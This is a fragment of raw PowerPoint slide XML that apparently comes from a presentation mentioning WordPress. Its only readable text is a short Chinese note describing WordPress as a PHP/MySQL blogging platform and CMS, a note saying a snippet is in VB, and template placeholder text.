        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="479220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zh-CN" sz="1000" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>WordPress</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>是一种使用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>语言开发的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>博客</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>平台，用户可以在支持</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1000" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1000" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>数据库的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>上架设属于自己的网站。也可以把 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1000" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>WordPress</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>当作一个</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>内容管理系统</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>CMS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>）来使用。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{55158CBF-4121-4F92-9E38-E421BCEB0D60}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1282813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81CD40-DA12-4893-857A-2E2D59A4F097}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1331202" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1331203" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>snipet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is in VB.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="199062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FFA74A54-A892-4428-971E-34A2DA7C937B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84995" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258888" y="720725"/>
            <a:ext cx="4800600" cy="3600450"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84996" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731844" y="4559928"/>
            <a:ext cx="5851514" cy="4320861"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1786714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69058" name="Group 1026"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="6858000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5760" cy="4320"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1069059" name="Group 1027"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="5760" cy="4320"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="5760" cy="4320"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1069060" name="Rectangle 1028"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm>
                <a:off x="2112" y="0"/>
                <a:ext cx="3648" cy="96"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="folHlink"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="1069061" name="Group 1029"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="5760" cy="4320"/>
                <a:chOff x="0" y="0"/>
                <a:chExt cx="5760" cy="4320"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1069062" name="Line 1030"/>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63" name="Line 1031"/>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64" name="Line 1032"/>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65" name="Line 1033"/>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66" name="Line 1034"/>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67" name="Line 1035"/>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68" name="Line 1036"/>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69" name="Line 1037"/>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70" name="Line 1038"/>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71" name="Line 1039"/>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72" name="Line 1040"/>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73" name="Line 1041"/>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74" name="Line 1042"/>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75" name="Line 1043"/>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76" name="Line 1044"/>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77" name="Line 1045"/>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78" name="Line 1046"/>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79" name="Line 1047"/>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80" name="Line 1048"/>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81" name="Line 1049"/>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82" name="Line 1050"/>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83" name="Line 1051"/>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84" name="Line 1052"/>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85" name="Line 1053"/>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86" name="Line 1054"/>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87" name="Line 1055"/>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88" name="Line 1056"/>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89" name="Line 1057"/>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90" name="Line 1058"/>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91" name="Line 1059"/>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92" name="Line 1060"/>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93" name="Line 1061"/>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94" name="Line 1062"/>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95" name="Line 1063"/>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96" name="Line 1064"/>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97" name="Line 1065"/>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98" name="Line 1066"/>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099" name="Line 1067"/>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100" name="Line 1068"/>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101" name="Line 1069"/>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102" name="Line 1070"/>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103" name="Line 1071"/>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104" name="Line 1072"/>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105" name="Line 1073"/>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106" name="Line 1074"/>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107" name="Line 1075"/>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108" name="Line 1076"/>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109" name="Line 1077"/>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110" name="Line 1078"/>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111" name="Line 1079"/>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9112" name="Line 1080"/>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grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1069113" name="Line 1081"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm>
                <a:off x="5568" y="0"/>
                <a:ext cx="0" cy="1488"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1069114" name="Group 1082"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3" y="559"/>
              <a:ext cx="4192" cy="1796"/>
              <a:chOff x="3" y="559"/>
              <a:chExt cx="4192" cy="1796"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1069115" name="Line 1083"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm>
                <a:off x="506" y="559"/>
                <a:ext cx="0" cy="1796"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1069116" name="Line 1084"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="3" y="1924"/>
                <a:ext cx="3211" cy="1"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1069117" name="Line 1085"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="384" y="938"/>
                <a:ext cx="3811" cy="1"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1069118" name="Arc 1086"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm rot="16200000" flipH="1">
                <a:off x="426" y="860"/>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endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1069119" name="Group 1087"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1480" y="1952"/>
              <a:ext cx="3808" cy="1812"/>
              <a:chOff x="1480" y="1952"/>
              <a:chExt cx="3808" cy="1812"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1069120" name="Line 1088"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm flipV="1">
                <a:off x="1480" y="3442"/>
                <a:ext cx="3808" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1069121" name="Line 1089"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm flipH="1">
                <a:off x="5172" y="1952"/>
                <a:ext cx="0" cy="1812"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1069122" name="Arc 1090"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm rot="5400000">
                <a:off x="5097" y="3346"/>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endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1069123" name="Rectangle 1091"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1752600"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1069124" name="Rectangle 1092" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="3309938"/>
            <a:ext cx="6400800" cy="1752600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1069125" name="Rectangle 1093"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="6248400"/>
            <a:ext cx="19050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lvl1pPr>
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1069126" name="Rectangle 1094"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="6248400"/>
            <a:ext cx="28956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lvl1pPr algn="ctr">
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1069127" name="Rectangle 1095"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7162800" y="6400800"/>
            <a:ext cx="1905000" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{C6C4C56B-C304-4C75-B5AB-3932B4AB3FDE}" type="slidenum">
              <a:rPr lang="en-GB"/>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6668ED6F-3C3A-4BD7-8BA3-86E57836DD0B}" type="slidenum">
              <a:rPr lang="en-GB"/>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304800"/>
            <a:ext cx="2057400" cy="6477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304800"/>
            <a:ext cx="6019800" cy="6477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76C70BA0-01BC-4F70-94D9-EF35BA7F764D}" type="slidenum">
              <a:rPr lang="en-GB"/>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8537170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593367"/>
            <a:ext cx="8520600" cy="7636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18" name="Shape 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1536633"/>
            <a:ext cx="8520600" cy="4555200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t"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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Shape 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472458" y="6217623"/>
            <a:ext cx="548700" cy="524800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
